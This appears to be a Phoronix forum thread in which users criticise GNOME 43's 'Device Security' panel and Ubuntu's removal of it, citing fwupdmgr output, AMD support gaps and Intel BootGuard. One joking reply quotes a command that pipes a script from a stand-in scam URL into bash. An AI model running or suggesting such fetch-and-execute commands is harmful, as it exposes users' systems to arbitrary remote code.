Announcement

Collapse
No announcement yet.

Ubuntu Isn't Yet Onboard With GNOME's "Device Security" Screen

Collapse
X
 
  • Filter
  • Time
  • Show
Clear All
new posts

  • Ubuntu Isn't Yet Onboard With GNOME's "Device Security" Screen

    Phoronix: Ubuntu Isn't Yet Onboard With GNOME's "Device Security" Screen

    Coming with GNOME 43 is a "Device Security" panel within the GNOME Control Center. While intended to help ensure their system is protected, Ubuntu isn't onboard with this Device Security functionality yet and has stripped it out from their GNOME build for Ubuntu 22.10...

    https://www.phoronix.com/news/Ubuntu...evice-Security

  • #2
    Good thing to do. It should not be exposed in GUI unless it allows making all relevant changes via the same GUI. A user advanced enough to set them currently does not have any need for the GUI

    Comment


    • #3
      Seems like a worthless feature anyways, Who cares if secure boot and TPM are on? Hell the only thing it might possibly be good for is seeing that TPM is not on, that would be worthy of celebration I suppose.

      What even is platform debugging referring to and processor security checks? They just mean checking if vulnerability mitigations are on don't they? They're always on unless the user turns them off usually, doesn't really deserve a check.

      All in all, this seems worthless, oh I'm sure a proper device security panel could be made that shows you some relevant information, but this isn't it.

      This panel tries to make security look like an on or off thing, but it's not, not really, it's more like a slider or a percentage, not everyone goes as far as installing SELinux for instance, some users don't really benefit from vulnerability mitigations (most of these seem more dangerous for servers than regular users in the first place), some people have pretty extreme firewall setups, most leave it pretty much open...

      There are reasons for all choices, tradeoffs (usually either convenience or performance in return for security), a panel that shows you more or less how secure your system is and what could be done to further improve it would be potentially quite useful (if a bit of a crutch maybe since such a panel could dangerously make you hyperfocus on what's on the panel and become blind to threats not covered by the panel), but this gnome device security panel just seems like lazy, meaningless work.
      Last edited by rabcor; 28 August 2022, 07:21 AM.

      Comment


      • #4
        If it just exposes the data from fwupdmgr it does not seem very useful to an average user:
        • ​​​​​​Several of the settings in question can only be changed from BIOS.
        • Some settings may require changes to the kernel command line (turning on IOMMU on my ThinkPad T480 for example). And those are off by default for a reason: doesn't work properly on all systems. Recovery from that is easy if you know what you are doing.
        • Some settings may be unavailable for a given hardware generation or on a particular system preventing higher levels at all on that hardware.
        • On my desktop with a Ryzen 5600X it just refuses to give any score at all due to missing hardware support. So it is an Intel only feature currently as far as I can tell.
        So if the data is to be useful to an average user this feature currently seems half baked. In fact even to an expert user and professional software developer it is not easy to parse. What is "CSME manufacturing mode" and how to I change "pre-boot DMA protection"? Even the fwupdmgr documentation is only half-done, it only explains some of these.

        Comment


        • #5
          “Our distro isn’t secure. Instead of fixing it, let’s hide the panel so people don’t find out!”

          - Ubuntu devs

          Comment


          • #6
            So I went ahead and filed a bug report about the poor documentation for fwupdmgr: https://github.com/fwupd/fwupd/issues/4959

            Oh by the way, KDE has exposed this for a some time already, though it is pretty hidden:
            1. System Settings -> About this System. In there click "Show More Information". This opens the separate program "Info Centre" (which you can also launch directly, is has a .desktop file).
            2. Then go Devices -> Firmware Security. This just shows the output from fwupdmgr security, even using a monospace font to do so (just like terminals do).

            Comment


            • #7
              Originally posted by cooperate View Post
              “Our distro isn’t secure. Instead of fixing it, let’s hide the panel so people don’t find out!”

              - Ubuntu devs
              Truth be told, I wouldn't even want it to be secured, given the extent of configuration required to do (even in fedora) and performance hit, with relatively little or no benefit to most users (at least me)
              Last edited by leo_sk; 28 August 2022, 07:57 AM.

              Comment


              • #8
                Originally posted by Vorpal View Post
                If it just exposes the data from fwupdmgr it does not seem very useful to an average user:
                • ​​​​​​Several of the settings in question can only be changed from BIOS.
                • Some settings may require changes to the kernel command line (turning on IOMMU on my ThinkPad T480 for example). And those are off by default for a reason: doesn't work properly on all systems. Recovery from that is easy if you know what you are doing.
                • Some settings may be unavailable for a given hardware generation or on a particular system preventing higher levels at all on that hardware.
                • On my desktop with a Ryzen 5600X it just refuses to give any score at all due to missing hardware support. So it is an Intel only feature currently as far as I can tell.
                So if the data is to be useful to an average user this feature currently seems half baked. In fact even to an expert user and professional software developer it is not easy to parse. What is "CSME manufacturing mode" and how to I change "pre-boot DMA protection"? Even the fwupdmgr documentation is only half-done, it only explains some of these.
                This is absolutely horrendous for the end user. If they have an AMD system (which accounts for an increasingly big chunk of the Linux userbase), then there is not even a score. That might lead the user to believe their AMD system is insecure and at risk, when it's just missing some Intel-only gimmicky features. I can't believe they will ship something like that.

                Comment


                • #9
                  Intel BootGuard
                  Ahh, yes. Let's encourage people to see it as virutous that your OEM-assembled system (Boot Guard wasn't even available for self-assembled PCs last I checked) has the "feature" that burns extra signature checks into one-time programmable memory in the PCH, permanently ruling out the possibility of BIOS modding and/or Coreboot-y things.​

                  Reminds me of how, last I heard, Windows 11 only allows self-built PCs to disable Virtualization Based Security, meaning pre-built PCs are at a permanent disadvantage if your goal is maximum performance.

                  Comment


                  • #10
                    Originally posted by cooperate View Post
                    “Our distro isn’t secure. Instead of fixing it, let’s hide the panel so people don’t find out!”

                    - Ubuntu devs
                    "You want me to run curl -s http://definitely.not/a_scam.sh | bash? GNOME says my system is secure, so it must be OK"

                    - Probably you

                    Comment

                    Working...
                    X